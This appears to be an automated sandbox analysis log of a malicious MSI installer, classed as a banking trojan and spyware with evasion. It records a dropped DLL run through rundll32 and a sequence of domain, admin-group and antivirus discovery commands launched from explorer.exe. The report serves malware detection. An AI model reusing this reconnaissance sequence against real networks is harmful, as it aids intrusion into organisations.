            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB34504_2_00007FFD92DB3450
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB1AA04_2_00007FFD92DB1AA0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB34504_2_00007FFD92DB3450
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB22104_2_00007FFD92DB2210
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB34504_2_00007FFD92DB3450
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB34504_2_00007FFD92DB3450
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DC60E04_2_00007FFD92DC60E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBC9304_2_00007FFD92DBC930
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92EDC2004_2_00007FFD92EDC200
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DC60E04_2_00007FFD92DC60E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB76B04_2_00007FFD92DB76B0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB57B04_2_00007FFD92DB57B0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB17104_2_00007FFD92DB1710
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB55E04_2_00007FFD92DB55E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB51604_2_00007FFD92DB5160
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB38304_2_00007FFD92DB3830
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB51604_2_00007FFD92DB5160
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB88B04_2_00007FFD92DB88B0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBB0904_2_00007FFD92DBB090
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB59E04_2_00007FFD92DB59E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DC64E04_2_00007FFD92DC64E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB3C804_2_00007FFD92DB3C80
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB38E04_2_00007FFD92DB38E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBB7804_2_00007FFD92DBB780
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB37904_2_00007FFD92DB3790
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DC58904_2_00007FFD92DC5890
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB18B04_2_00007FFD92DB18B0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92FE78A44_2_00007FFD92FE78A4
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB7F104_2_00007FFD92DB7F10
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBE6804_2_00007FFD92DBE680
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB4F204_2_00007FFD92DB4F20
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBB0104_2_00007FFD92DBB010
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBDAB04_2_00007FFD92DBDAB0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBF8604_2_00007FFD92DBF860
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018004437C4_2_000000018004437C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800377884_2_0000000180037788
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002600C4_2_000000018002600C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A01C4_2_000000018002A01C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800462C44_2_00000001800462C4
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A3144_2_000000018000A314
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800423EC4_2_00000001800423EC
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001A47C4_2_000000018001A47C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800125504_2_0000000180012550
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018003A5544_2_000000018003A554
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018003E7044_2_000000018003E704
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800167444_2_0000000180016744
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800147EC4_2_00000001800147EC
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800268904_2_0000000180026890
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018003A9044_2_000000018003A904
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800329B44_2_00000001800329B4
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180042A104_2_0000000180042A10
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008D6C4_2_0000000180008D6C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180032E144_2_0000000180032E14
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180048E5A4_2_0000000180048E5A
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180036E704_2_0000000180036E70
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180024F604_2_0000000180024F60
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000AF744_2_000000018000AF74
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800190204_2_0000000180019020
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800130784_2_0000000180013078
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018003D08C4_2_000000018003D08C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800330A84_2_00000001800330A8
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B1384_2_000000018001B138
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018003713C4_2_000000018003713C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800332784_2_0000000180033278
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F28C4_2_000000018001F28C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018003B2944_2_000000018003B294
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800193F04_2_00000001800193F0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018003B5084_2_000000018003B508
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018004363C4_2_000000018004363C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800176E44_2_00000001800176E4
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800097A84_2_00000001800097A8
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800197C04_2_00000001800197C0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800478344_2_0000000180047834
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800158A04_2_00000001800158A0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018003D91C4_2_000000018003D91C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B9244_2_000000018001B924
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800279B84_2_00000001800279B8
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180045A604_2_0000000180045A60
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FA9C4_2_000000018001FA9C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013BA04_2_0000000180013BA0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029D904_2_0000000180029D90
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180015EA04_2_0000000180015EA0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002FF504_2_000000018002FF50
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001DA01436FE04_2_000001DA01436FE0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001DA0143AFF04_2_000001DA0143AFF0
            Source: C:\Windows\explorer.exeCode function: 7_2_02F221647_2_02F22164
            Source: C:\Windows\explorer.exeCode function: 7_2_02F21A8C7_2_02F21A8C
            Source: C:\Windows\explorer.exeCode function: 7_2_02F21A7C7_2_02F21A7C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B844B507_2_0B844B50
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8D97087_2_0B8D9708
            Source: C:\Windows\explorer.exeCode function: 7_2_0B88BB947_2_0B88BB94
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8DEBB87_2_0B8DEBB8
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8C2B387_2_0B8C2B38
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8CDB347_2_0B8CDB34
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8B0B547_2_0B8B0B54
            Source: C:\Windows\explorer.exeCode function: 7_2_0B88EA847_2_0B88EA84
            Source: C:\Windows\explorer.exeCode function: 7_2_0B870A8A7_2_0B870A8A
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8B89807_2_0B8B8980
            Source: C:\Windows\explorer.exeCode function: 7_2_0B84D9E47_2_0B84D9E4
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8D49407_2_0B8D4940
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8CD8B87_2_0B8CD8B8
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8B98B07_2_0B8B98B0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B89481C7_2_0B89481C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8788247_2_0B878824
            Source: C:\Windows\explorer.exeCode function: 7_2_0B87D8347_2_0B87D834
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8A78747_2_0B8A7874
            Source: C:\Windows\explorer.exeCode function: 7_2_0B847FD07_2_0B847FD0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8BAF207_2_0B8BAF20
            Source: C:\Windows\explorer.exeCode function: 7_2_0B889F687_2_0B889F68
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8DAE847_2_0B8DAE84
            Source: C:\Windows\explorer.exeCode function: 7_2_0B84BEB87_2_0B84BEB8
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8A1ECC7_2_0B8A1ECC
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8D0EC07_2_0B8D0EC0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B897EE87_2_0B897EE8
            Source: C:\Windows\explorer.exeCode function: 7_2_0B85FE387_2_0B85FE38
            Source: C:\Windows\explorer.exeCode function: 7_2_0B869D947_2_0B869D94
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8D9D947_2_0B8D9D94
            Source: C:\Windows\explorer.exeCode function: 7_2_0B87EDE07_2_0B87EDE0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B898DF87_2_0B898DF8
            Source: C:\Windows\explorer.exeCode function: 7_2_0B870D187_2_0B870D18
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8B5D687_2_0B8B5D68
            Source: C:\Windows\explorer.exeCode function: 7_2_0B849CBC7_2_0B849CBC
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8A7C147_2_0B8A7C14
            Source: C:\Windows\explorer.exeCode function: 7_2_0B86FC727_2_0B86FC72
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8B73A07_2_0B8B73A0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8883EC7_2_0B8883EC
            Source: C:\Windows\explorer.exeCode function: 7_2_0B84E31C7_2_0B84E31C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8463587_2_0B846358
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8CB3707_2_0B8CB370
            Source: C:\Windows\explorer.exeCode function: 7_2_0B89318C7_2_0B89318C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B85D19C7_2_0B85D19C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8A11CC7_2_0B8A11CC
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8751C07_2_0B8751C0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8701FB7_2_0B8701FB
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8A01147_2_0B8A0114
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8B41347_2_0B8B4134
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8B01547_2_0B8B0154
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8870C07_2_0B8870C0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B89F0187_2_0B89F018
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8660387_2_0B866038
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8AA0487_2_0B8AA048
            Source: C:\Windows\explorer.exeCode function: 7_2_0B87E0747_2_0B87E074
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8460787_2_0B846078
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8A87887_2_0B8A8788
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8577E07_2_0B8577E0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8B672C7_2_0B8B672C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8657687_2_0B865768
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8CD63C7_2_0B8CD63C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8696507_2_0B869650
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8705A07_2_0B8705A0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B88B5D07_2_0B88B5D0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8A05FC7_2_0B8A05FC
            Source: C:\Windows\explorer.exeCode function: 7_2_0B86F5FB7_2_0B86F5FB
            Source: C:\Windows\explorer.exeCode function: 7_2_0B84453C7_2_0B84453C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8B55347_2_0B8B5534
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8605407_2_0B860540
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8485687_2_0B848568
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8A45647_2_0B8A4564
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8A34987_2_0B8A3498
            Source: C:\Windows\explorer.exeCode function: 7_2_0B88F4C47_2_0B88F4C4
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8A84D87_2_0B8A84D8
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8C94F07_2_0B8C94F0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8B24307_2_0B8B2430
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8974487_2_0B897448
            Source: C:\Windows\explorer.exeCode function: 7_2_0B89E45C7_2_0B89E45C
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD930E0390 appears 72 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 000000018002CC54 appears 39 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92DDCF20 appears 62 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180007B1C appears 38 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92DDA4B0 appears 324 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92DC0370 appears 32 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92DDBAB0 appears 196 times
            Source: C:\Windows\explorer.exeCode function: String function: 0B84D6E8 appears 52 times
            Source: C:\Windows\explorer.exeCode function: String function: 0B84D5A8 appears 35 times
            Source: C:\Windows\explorer.exeCode function: String function: 0B84E160 appears 147 times
            Source: C:\Windows\explorer.exeCode function: String function: 0B867D54 appears 31 times
            Source: appgpuset.dll.2.drStatic PE information: Number of sections : 12 > 10
            Source: lavita.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs lavita.msi
            Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
            Source: classification engineClassification label: mal100.spre.bank.troj.spyw.evad.winMSI@62/24@5/4
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DC1180 FreeLibrary,FreeLibrary,GetModuleFileNameW,GetLastError,FormatMessageW,4_2_00007FFD92DC1180
            Source: C:\Windows\System32\rundll32.exeCode function: 4_3_00007DF496590000 CreateToolhelp32Snapshot,Process32First,Process32Next,4_3_00007DF496590000
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DC1460 CoCreateInstance,4_2_00007FFD92DC1460
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLC533.tmpJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
            Source: C:\Windows\System32\rundll32.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:992:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2540:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2036:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:2736:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:5424:120:WilError_03
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF5F817CD448FE08F8.TMPJump to behavior
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFunc
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavita.msi"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50018695A6192D85B7480687F9E151A9
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFunc
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net config workstation
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50018695A6192D85B7480687F9E151A9Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFuncJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /allJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfoJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trustsJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trustsJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domainJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /allJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domainJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:ListJump to behavior
            Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /allJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domainJump to behavior
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\net.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
